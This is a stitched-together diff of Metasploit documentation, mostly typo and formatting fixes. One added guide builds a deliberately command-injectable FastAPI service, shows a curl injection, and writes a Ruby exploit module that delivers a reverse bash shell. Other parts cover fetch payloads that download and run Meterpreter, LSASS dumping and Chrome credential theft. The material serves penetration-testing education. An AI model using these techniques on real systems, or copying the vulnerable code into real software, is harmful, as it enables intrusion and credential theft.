`cmd/linux/https/x64/meterpreter/reverse_tcp` Will do four things:
1) Create a `linux/x64/meterpreter/reverse_tcp` elf binary to be the served payload.
2) Serve the above served payload on an HTTPS server
3) Start a served payload handler for the served payload to call back to
4) Generate a command to execute on a remote host that will download the served payload and run it.
1. Create a `linux/x64/meterpreter/reverse_tcp` elf binary to be the served payload.
2. Serve the above served payload on an HTTPS server
3. Start a served payload handler for the served payload to call back to
4. Generate a command to execute on a remote host that will download the served payload and run it.
## A Simple Stand-Alone Example
@@ -182,7 +183,7 @@ payloads. All I did was give an array value for the `Platform` value and change
For the `execute_command` method, nothing changes:
``` ruby
```ruby
def execute_command(cmd, _opts = {})
populate_values if @sid.nil? || @token.nil?
uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'
@@ -206,7 +207,7 @@ end
The only change in the exploit method is the use of the more generic `Type` value in the case statement. Nothing else
needs to change.
``` ruby
```ruby
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
@@ -221,7 +222,7 @@ needs to change.
If you have an exploit that already supports Unix Command payloads and you'd like it to support Linux Command payloads
like Fetch Payloads, you can simply add the `linux` value to the platform array:
``` ruby
```ruby
'Nix Command',
{
'Platform' => [ 'unix', 'linux' ],
@@ -330,4 +331,4 @@ present on a system, so the command will be `tnftp` rather than `ftp`.
#### WGET
WGET is likely the first choice for a linux-only target. It supports both HTTPS and HTTP and all Fetch payload options.
It is ubiquitous on Linux hosts and very standard, making it an excellent choice.
It is ubiquitous on Linux hosts and very standard, making it an excellent choice.
@@ -20,7 +20,7 @@ When the mixin is included, notice there will be the following datastore options
* **SSLVerifyMode** - Verification mode: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER. Default is PEER.
* **Proxies** - Allows your module to support proxies.
* **ConnectTimeout** - Default is 10 seconds.
* **TCP::max_send_size** - Evasive option. Maxiumum TCP segment size.
* **TCP::max_send_size** - Evasive option. Maximum TCP segment size.
* **TCP::send_delay** - Evasive option. Delays inserted before every send.
If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"
@@ -126,4 +126,4 @@ def send_recv_once(data)
buf
end
```
```
@@ -84,7 +84,7 @@ module Metasploit
class SymantecWebGateway < HTTP
# Attemps to login to the server.
# Attempts to login to the server.
#
# @param [Metasploit::Framework::Credential] credential The credential information.
# @return [Result] A Result object indicating success or failure
@@ -68,7 +68,7 @@ def on_request_uri(cli, request)
end
```
Of course, when you write a Metasploit browser exploit there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provies all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or checkout existing code examples (especially the recent ones).
Of course, when you write a Metasploit browser exploit there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provides all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or checkout existing code examples (especially the recent ones).
To get things started, you can always use the following template to start developing your browser exploit:
@@ -37,6 +37,10 @@ The `CheckCode` also supports an optional description which is printed by the fr
return CheckCode::Appears('Vulnerable component XYZ is installed')
```
`MetasploitModule#check` methods should capture any known `raise` from methods called and return value of class
`Msf::Exploit::CheckCode`. Basically, that means avoiding the use of `fail_with` or raising exceptions that are not
handled within the check method.
## Remote Check Example
Here's an abstract example of how a Metasploit check might be written:
@@ -54,7 +58,7 @@ def check
http_body = get_http_body
if http_body
if http_body =~ /Something CMS v1\.0/
# We are able to find the version thefore more precise about the vuln state
# We are able to find the version therefore more precise about the vuln state
return Exploit::CheckCode::Appears
elsif http_body =~ /Something CMS/
# All we can tell the vulnerable app is running, but no more info to
@@ -0,0 +1,210 @@
If you've found a way to execute a command on a target, and you'd like to make a simple exploit module to get a shell, this guide is for you. Alternatively, if you have access to **fetch** commands on the target (curl, wget, ftp, tftp, tnftp, or certutil), you can use a [[Fetch Payload|How-to-use-fetch-payloads]] for a no-code solution.
By the end of this guide you'll understand how to turn [Command injection](https://owasp.org/www-community/attacks/Command_Injection) into a shell - from here, you can move on to the [[command stager|How-to-use-command-stagers]] article and upgrade your basic `:unix_cmd` Target to a Dropper for all kinds of payloads with variable command stagers.
This guide assumes *some* knowledge of programming (Understand what a class is, what methods/functions are) but expects no in-depth knowledge of Metasploit internals.
## A Vulnerable Service
For the vulnerable service test case, we'll be using a simple FastAPI service. This is very easy to spin up:
1. Install `fastapi[all]` using your preferred Python package manager (a virtual environment is recommended)
2. Create a file to hold some Python code (I'll call it `main.py`)
3. Copy the following code into your file:
```python
from fastapi import FastAPI, Response
import subprocess
app = FastAPI()
@app.get("/ping")
def ping(ip : str):
res = subprocess.run(f"ping -c 1 {ip}", shell=True, capture_output=True)
return Response(content=res.stdout.decode("utf-8"), media_type="text/plain")
```
4. Start your vulnerable service with `uvicorn main:app`
5. Test that the application works with `curl`:
```sh
$ curl http://localhost:8000/ping?ip=1.1.1.1
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.7 ms
--- 1.1.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 16.739/16.739/16.739/0.000 ms
```
6. Test that your application is exploitable - also with `curl`:
```sh
$ curl localhost:8000/ping?ip=1.1.1.1%20%26%26id
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.6 ms
--- 1.1.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 16.614/16.614/16.614/0.000 ms
uid=1000(meta) gid=1000(meta)
```
With this output `uid=1000(meta) gid=1000(meta)`, we know that the `id` command successfully executed on the target system. Now that we have a vulnerable application we can write a module to pwn it.
## The Structure of a Module
To have a functioning command injection Metasploit module we **need** a few things:
1. Create a subclass of `Msf::Exploit::Remote`
2. Include the `Msf::Exploit::Remote::HttpClient` mixin
3. Define three methods:
- `initialize`, which defines metadata for the Module
- `execute_command`, which is what runs the command against the remote server
- `exploit`, wraps `execute_command`, and can handle some logic when we move to a cmdstager module
4. (Not required, but recommended) a method to substitute or escape bad characters, to be used inside `execute_command`. This could also just be done inside `execute_command` instead of a separate function call.
### Where to put a Module
Metasploit looks for custom modules at `$HOME/.msf4/modules`, but the way you get modules there varies based on how you're running Metasploit.
- If you have a full install of Metasploit on your host, you can just add your custom module to `$HOME/.msf4/modules/exploits/custom_mod.rb`.
- You can also just add a module to Metasploit's modules folder - This can be helpful when troubleshooting, but it's not recommended
- **Docker** If you're using the [Docker Image](https://github.com/rapid7/metasploit-framework/tree/master/docker), you can also add modules to `$HOME/.msf4/modules` and that folder will be mounted as a volume inside the Docker container
- You can also change the mount point by modifying the [docker-compose](https://github.com/rapid7/metasploit-framework/blob/master/docker-compose.yml) file
For testing, the easiest thing to do is the simplest. You can find Metasploit's **exploit** directory, copy a file, rename it, and go from there.
## A Shell of a Module
The shell of a module that follows the above format is something like this:
```ruby
class MetasploitModule < msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
# empty for now
end
def filter_bad_chars(cmd)
# empty for now
end
def execute_command(cmd, _opts = {})
# empty for now
end
def exploit
# empty for now
end
end
```
This covers every essential point from [The Structure of a Module](#the-structure-of-a-module), although it won't run yet.
## Initialize
The `initialize` method is used to define and pass metadata. Every `initialize` method in the metasploit-framework codebase follows the format of an empty `info` being passed into `update_info`, which gets passed to the `msf::Exploit::Remote` `initialize` method:
```ruby
def initialize(info = {})
super(
update_info(
info,
# Here is where the metadata goes
'Name' => 'Command Injection against a test Ping endpoint',
'Description' => 'This exploits a command injection vulnerability against a test application',
'License' => MSF_LICENSE,
'Author' => 'YOUR NAME',
'References' => [
['URL', 'https://metasploit.com/']
],
'DisclosureDate' => '2023-08-04',
'Platform' => 'linux', # used for determining compatibility - if you're doing code injection, this may be the language of the webapp
'Targets' => [
'Unix Command',
{
'Platform' => ['linux', 'unix'], # linux and unix have different cmd payloads, this gives you more options
'Arch' => ARCH_CMD,
'Type' => :unix_cmd, # Running a command - this would be `:linux_dropper` for a cmdstager dropper
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash',
'RPORT' => 8000,
}
}
],
'Payload' => {
'BadChars' => '\x00',
}
'Notes' => { # Required for new modules https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
# Some more metadata options are here: https://docs.metasploit.com/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module
)
)
end
```
All that this method does is register metadata to the module.
## Filtering
It's important to ensure that payloads being sent are properly encoded. As an example, if you send a request to the `/ping` endpoint that looks like `/ping?ip=1.1.1.1&&id`, you won't see the "uid=1000(meta) gid=1000(meta)" in the response because `&` is a special character in HTTP.
Encoding requirements might change based on the application you're trying to inject, so experiment if things aren't working.
```ruby
def filter_bad_chars(cmd)
return cmd
.gsub(/&/, '%26')
.gsub(/ /, '%20')
end
```
`filter_bad_chars` takes in `cmd`, which is a string. `cmd` has two substitutions applied - the first will translate `&` to `%26`, the second translates a space to `%20`. The `.gsub` statements are a global substitution across the string, so the entire payload is impacted by the substitutions here (Similar to str.replace in Python). Regardless of whether or not the string is modified, it is returned.
## Execution
The `execute_command` method takes in `cmd` and `_opts` and executes the command on the target. In our case, executing a command is simply adding the command to a GET request and sending it to the `/ping` endpoint on our sample service.
```ruby
def execute_command(cmd, _opts = {})
send_request_cgi({
'method' => 'GET',
'uri' => '/ping',
'encode_params' => false,
'vars_get' => {
'ip' => "bing.com%20%26%26%20#{filter_bad_chars(cmd)}",
}
})
end
```
We don't even need to handle the output of `send_request_cgi` (Really, there should be no return until the shell exits, since the call to `subprocess.run` doesn't return until that shell dies).
## Exploitation
To finish up, all we need is to define the `exploit` method. This method is called by Metasploit when you use `run` within a msfconsole. All that we'll do here is print a little status message and run the exploit, but later you can modify this method to handle droppers as well:
```ruby
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
execute_command(payload.encoded)
end
```
If you're running Metasploit and the vulnerable Python service on the same machine, you should be able to simply set the variables and fire:
```sh
set RHOST 127.0.0.1
set LHOST 127.0.0.1
run
```
## Conclusion
That's it. Put it all together and you have a very simple Command Injection exploit module that shows you the basics of how to throw a payload. Play around with different payloads, follow the [[How-to-use-command-stagers]] guide, add some logging to the Python web server, and watch executions over Wireshark. You'll learn a lot.
@@ -54,16 +54,16 @@ In addition, we're going to add a magical line to the config file that will let
So, open up `metasploit-framework/.git/config` with your favorite editor, add an upstream remote, and add the pull request refs for both your and Rapid7's forks. In the end, you should have a section that started off like this:
````config
```config
[remote "upstream"]
fetch = +refs/heads/*:refs/remotes/upstream/*
fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*
url = https://github.com/rapid7/metasploit-framework
````
```
And now it looks like this:
````config
```config
[remote "upstream"]
fetch = +refs/heads/*:refs/remotes/upstream/*
fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*
@@ -72,13 +72,13 @@ And now it looks like this:
fetch = +refs/heads/*:refs/remotes/origin/*
fetch = +refs/pull/*/head:refs/remotes/origin/pr/*
url = https://github.com/YOURNAME/metasploit-framework
````
```
Some people like to copy these over into remotes named "rapid7" and "yourusername" just so they don't have to remember about "origin" and "upstream," but for this doc, we'll just assume you have "origin" and "upstream" defined like this.
Now, you can git fetch the remote PRs. This will take a little bit, since we have a couple dozen MBs of pull request data. Storage is cheap, though, right?
````
```
$ git fetch --all
Fetching todb-r7
remote: Counting objects: 13, done.
@@ -97,7 +97,7 @@ From https://github.com/rapid7/metasploit-framework
[... bunches of tags and PRs ...]
* [new ref] refs/pull/1701/head -> upstream/pr/1701
* [new ref] refs/pull/1702/head -> upstream/pr/1702
````
```
You can `git fetch` a remote any time, and you'll get access to the latest changes to all branches and pull requests.
@@ -105,7 +105,7 @@ You can `git fetch` a remote any time, and you'll get access to the latest chang
A manageable strategy for dealing with outstanding PRs is to start pre-merge testing on the pull request in isolation. For example, to work on PR #1217, we would:
````
```
$ git checkout upstream/pr/1217
Note: checking out 'upstream/pr/1217'.
@@ -124,7 +124,7 @@ HEAD is now at 9e499e5... Make BindTCP test more robust
```
$ git checkout -b landing-1217
````
```
Now, we're on a local branch identical to the original pull request, and can move on from there. We can make our changes, isolated from master, and then either send them back to the contributor (this requires looking up the original contributor's GitHub username and branch name on GitHub), or if there aren't any changes or the changes are trivial, we can land them (if you have committer rights to Rapid7's repo, this is where you land them to the upstream repo).
@@ -173,7 +173,7 @@ You need to add their fork once as a remote: `git remote add OTHER_USER git://gi
# Making changes
````
```
$ gvim .gitignore
[... make some changes and some commits ...]
(landing-1217) todb@mazikeen:~/git/rapid7/metasploit-framework
@@ -184,19 +184,19 @@ $ git push origin pr1271-fix-gitignore-conflict
(pr1217-fix-gitignore-conflict) todb@mazikeen:~/git/rapid7/metasploit-framework
$ git pr-url schierlm javapayload-maven
Created new window in existing browser session.
````
```
This sequence does a few things after editing `.gitconfig`. It creates another copy of landing-1217 (which is itself a copy of upstream/pr/1217)). Next, I push those changes to my branch (todb-r7, aka "origin"). Finally, I have a mighty [.gitconfig alias here](https://gist.github.com/todb-r7/5438391) to open a browser window to send a pull request to the original contributor's branch (you will want to edit yours to reflect your real GitHub username, of course).
````
```ini
pr-url = !"echo https://github.com/YOURNAME/metasploit-framework/pull/new/HISNAME:HISBRANCH...YOURBRANCH"
````
```
Filling in the blanks (provided by the original PR's information from GitHub) gets me:
````
```
https://github.com/todb-r7/metasploit-framework/pull/new/schierlm:javapayload-maven...pr1217-fix-gitignore-conflict
````
```
I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once [@schierlm](https://github.com/schierlm) landed it on his branch (again, using `git merge --no-ff` and a short, informational merge commit message), all I (or anyone) had to do was `git fetch` to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue.
@@ -208,7 +208,7 @@ Note the important bit here: **you do not need commit rights to Rapid7 to branch
Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else ([@jlee-r7](https://github.com/jlee-r7)) was able to to do something like this:
````
```
$ git fetch upstream
remote: Counting objects: 12, done.
remote: Compressing objects: 100% (2/2), done.
@@ -216,31 +216,31 @@ remote: Total 7 (delta 5), reused 7 (delta 5)
Unpacking objects: 100% (7/7), done.
From https://github.com/rapid7/metasploit-framework
9e499e5..263e967 refs/pull/1651/head -> upstream/pr/1651
````
```
This all looked good, so he could land this to Rapid7's repo with:
````
``
$ git checkout -b upstream-master --track upstream/master
$ git merge -S --no-ff --edit landing-1217
$ git push upstream upstream-master:master
````
``
Or, if he already have upstream-master checked out:
````
```
$ git checkout upstream-master
$ git rebase upstream/master
$ git merge -S --no-ff --edit landing-1217
$ git push upstream upstream-master:master
````
```
The `--edit` is optional if we have our editor configured correctly in `$HOME/.gitconfig`. The point here is that we *always* want a merge commit, and we *never* want to use the (often useless) default merge commit message. For #1217, this was changed to:
````commit
```
Land #1217, java payload build system refactor
````
```
Note that you should rebase *before* landing -- otherwise, your merge commit will be lost in the rebase.
@@ -248,7 +248,7 @@ Finally, the -S indicates we are going to sign the merge, using our GPG key. Thi
To set yourself up for signing, your .gitconfig (or metasploit-framework/git/.config) file should have these entries:
````
```ini
[user]
name = Your Name
email = your@email.xxx
@@ -256,7 +256,7 @@ signingkey = DEADBEEF # Must match exactly with your key for "Your Name <your@em
[alias]
c = commit -S --edit
m = merge -S --no-ff --edit
````
```
People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].
@@ -271,10 +271,6 @@ Release note examples:
The [rn-no-release-notes](https://github.com/rapid7/metasploit-framework/issues?utf8=%E2%9C%93&q=label%3Arn-no-release-notes+) label must be added if there are no release notes for the merged pull request.
# Cross-linking PRs, Bugs, and Commits
TODO: Update in this new post-Redmine, GitHub issues world
# Merge conflicts
The nice thing about this strategy is that you can test for merge conflicts straight away. You'd use a sequence like:
@@ -16,7 +16,7 @@ If listeners are externalized, then there is an API layer both for interactive i
### Integration of native tool-chains
Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a diffcult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.
Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a difficult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.
### Native first-class UUID-aware, async stager payload
@@ -26,7 +26,7 @@ Make a new async payload type (based on pingback payload work) making secure com
### Overhaul network targeting
Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart futher. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:
Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart further. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:
```
set TARGETS https://user:password@target_app:4343 https://target_app2
@@ -0,0 +1,62 @@
## Sessions Command
### Session Search
When you have a number of sessions open, searching can be a useful tool to navigate them. This guide explains what capabilities are available for navigating open sessions with search.
You can get a list of sessions matching a specific criteria within msfconsole:
```msf
msf6 payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_id:2"
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WIN-ED9KFH65RDH\Zach Goldman @WIN-ED9KFH65RDH 192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132)
```
Currently, the only supported keywords for search are `session_id`, `session_type`, and `last_checkin`. These keywords can be combined to further filter your results, and used with other flags. For example:
```msf
msf6 payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_type:meterpreter last_checkin:greater_than:10s last_checkin:less_than:10d5h2m30s" -v
Active sessions
===============
Session ID: 1
Name:
Type: meterpreter windows
Info: WIN-ED9KFH65RDH\Zach Goldman @ WIN-ED9KFH65RDH
Tunnel: 192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132)
Via: exploit/multi/handler
Encrypted: Yes (AES-256-CBC)
UUID: 958f7b976db67d60/x86=1/windows=1/2023-10-19T12:38:05Z
CheckIn: 21725s ago @ 2023-10-19 09:26:08 -0500
Registered: No
```
Of note in the above example, `last_checkin` requires an extra argument. The second argument must be either `greater_than` or `less_than`. The third argument can be a sequence of alternating amounts and units of time (d: days, h: hours, m: minutes, and s: seconds), i.e. `5m2s`, `10d`, or `1d5m`.
### Killing stale sessions
If `--search` is used in conjunction with `--kill-all`, it will restrict the latter function to only the search results. For example:
```msf
msf6 payload(windows/meterpreter/reverse_http) > sessions -K -S "session_type:meterpreter"
[*] Killing matching sessions...
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WIN-ED9KFH65RDH\Zach Goldman @ WIN-ED9KFH65RDH 192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132)
2 meterpreter x86/windows WIN-ED9KFH65RDH\Zach Goldman @ WIN-ED9KFH65RDH 192.168.2.1:4444 -> 192.168.2.132:52192 (192.168.2.132)
[*] 192.168.2.132 - Meterpreter session 1 closed.
[*] 192.168.2.132 - Meterpreter session 2 closed.
msf6 payload(windows/meterpreter/reverse_http) >
```
@@ -73,7 +73,7 @@ This module has a selection of inbuilt queries which can be configured via the `
- `ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
- `ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
- `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow constrained delegation.
- `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
- `ENUM_DOMAIN` - Dump info about the Active Directory domain.
@@ -89,7 +89,7 @@ This module has a selection of inbuilt queries which can be configured via the `
- `ENUM_MACHINE_ACCOUNT_QUOTA` - Dump the number of computer accounts a user is allowed to create in a domain.
- `ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
- `ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow unconstrained delegation.
- `ENUM_USER_ACCOUNT_DISABLED` - Dump info about disabled user accounts.
- `ENUM_USER_ACCOUNT_LOCKED_OUT` - Dump info about locked out user accounts.
- `ENUM_USER_ASREP_ROASTABLE` - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.
@@ -23,7 +23,7 @@ Matching Modules
There are two ways to launch a Post module, both require an existing session.
Within a msf prompt you can use the `use` comand followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
Within a msf prompt you can use the `use` command followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
```msf
msf6 > use post/windows/gather/enum_chrome
@@ -4,7 +4,7 @@ SMB (Server Message Blocks), is a way for sharing files across nodes on a networ
There are two main ports for SMB:
- 139/TCP - Initially Microsoft implemented SMB ontop of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
- 139/TCP - Initially Microsoft implemented SMB on top of their existing NetBIOS network architecture, which allowed for Windows computers to communicate across the same network
- 445/TCP - Newer versions of SMB use this port, were NetBIOS is not used.
Other terminology to be aware of:
@@ -10,7 +10,7 @@ Meterpreter even when running on the Windows platform.
crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated
session to avoid losing access altogether.
The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefor subject to
The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefore subject to
the same limitations.
The following functions are unavailable:
@@ -33,8 +33,6 @@ The `bofloader` extension provides exactly one command, through which all of the
`execute_bof </path/to/bof_file> [Options] -- [BOF Arguments]`
* `-c` / `--compile` -- Compile the input file (requires mingw).
* `-e` / `--entry` -- The entry point (default: `go`).
* `-f` / `--format-string` -- Argument format-string. See details below.
@@ -79,7 +77,7 @@ argument format string.
# Usage Examples
Executing [dir][4], passing the path argument and number of sub-directories to list.
```
```msf
meterpreter > execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\ 0
Contents of C:\*:
08/05/2022 15:17 <dir> $Recycle.Bin
@@ -103,7 +101,7 @@ meterpreter >
Executing [nanodump][5]. First the PID of LSASS is found, then the argument string is constructed. The output must be
written to disk. Once completed, the dump file can be downloaded from the remote host.
```
```msf
meterpreter > ps lsass
Filtering on 'lsass'
@@ -32,7 +32,7 @@ Each value also has an associated type, for example:
All of these examples assume you are in a Meterpreter session. To see the latest help information run `help reg`:
```
```msf
meterpreter > help reg
Usage: reg [command] [options]
Interact with the target machine's registry.
@@ -44,7 +44,7 @@ Interact with the target machine's registry.
Registry keys must be escaped correctly. Window's registry keys are escaped with backslashes. In msfconsole backslashes and spaces have a special meaning - which means you will need to escape these characters for your key to work as expected.
```
```msf
# Valid: Using single quotes around the registry key
meterpreter > reg enumkey -k 'HKCU\Keyboard Layout'
@@ -75,7 +75,7 @@ Active sessions
For example - when interacting with a x86 session there are 12 keys listed:
```
```msf
# x86 Session
meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
@@ -86,7 +86,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
Versus a x64 session which shows 23 keys:
```
```msf
# x64 Session
meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
@@ -98,7 +98,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
If this is problematic either [[upgrade your session to Meterpreter|./Metasploit-Guide-Upgrading-Shells-to-Meterpreter.md]], or specify the `-w` flag which will impact the result of queries:
```
```msf
meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 32
Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
@@ -106,7 +106,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
# ... omitted for clarity ...
```
```
```msf
meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 64
Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
@@ -119,7 +119,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
Enumerate a root key:
```
```msf
meterpreter > reg enumkey -k HKLM
Enumerating: HKLM
@@ -135,7 +135,7 @@ Enumerating: HKLM
Enumerate a subkey:
```
```msf
meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
@@ -149,7 +149,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Display the registry value and type information:
```
```msf
meterpreter > reg queryval -k 'HKLM\Software\Microsoft\Windows NT\CurrentVersion' -v ProductName
Key: HKLM\Software\Microsoft\Windows NT\CurrentVersion
Name: ProductName
@@ -159,7 +159,7 @@ Data: Windows 10 Enterprise
Values that are of type `REG_SZ_EXPAND` such as ` %SystemRoot%\system32\drivers\GM.DLS` will not automatically be expanded:
```
```msf
meterpreter > reg queryval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic' -v 'GMFilePath'
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic
Name: GMFilePath
@@ -169,7 +169,7 @@ Data: C:\Windows\system32\drivers\GM.DLS
Values that are of type `REG_MULTI_SZ` will be separated by `\0`:
```
```msf
meterpreter > reg queryval -k 'HKLM\Software\example' -v 'example multi value with spaces'
Key: HKLM\Software\example
Name: example multi value with spaces
@@ -179,7 +179,7 @@ Data: line1\0line2\0line3
### Creating a key
```
```msf
meterpreter > reg createkey -k 'HKLM\software\example'
Successfully created key: HKLM\software\example
```
@@ -188,42 +188,42 @@ Successfully created key: HKLM\software\example
Setting a `REG_DWORD` - use a decimal value:
```
```msf
meterpreter > reg setval -k 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1
Successfully set LocalAccountTokenFilterPolicy of REG_DWORD.
```
Setting a `REG_QWORD` - use a decimal value:
```
```msf
meterpreter > reg setval -k 'HKLM\Software\example' -t REG_DWORD -v qword_example -d 12345678
Successfully set example multi value with spaces of REG_MULTI_SZ.
```
Setting `REG_MULTI_SZ` - i.e. an array of strings:
```
```msf
meterpreter > reg setval -k 'HKLM\Software\example' -t REG_MULTI_SZ -v 'example multi value with spaces' -d 'line1\0line2\0line3'
Successfully set example multi value with spaces of REG_MULTI_SZ.
```
Setting `REG_BINARY` - use lowercase hexadecimal input without the preceding `0x`:
```
```msf
meterpreter > reg setval -k 'HKLM\Software\example' -t REG_BINARY -v binary_example -d deadbeef
Successfully set binary_example of REG_BINARY.
```
### Deleting a key
```
```msf
meterpreter > reg deletekey -k 'HKLM\software\example'
Successfully deleted key: HKLM\software\example
```
### Deleting a value
```
```msf
meterpreter > reg deleteval -k 'HKLM\software\example' -v 'example multi value with spaces'
Successfully deleted example multi value with spaces.
```
@@ -2,7 +2,7 @@ Of the many recent changes to Meterpreter, reliable network communication is one
In the case of HTTP/S transports, some resiliency features were present. Thanks to its stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur.
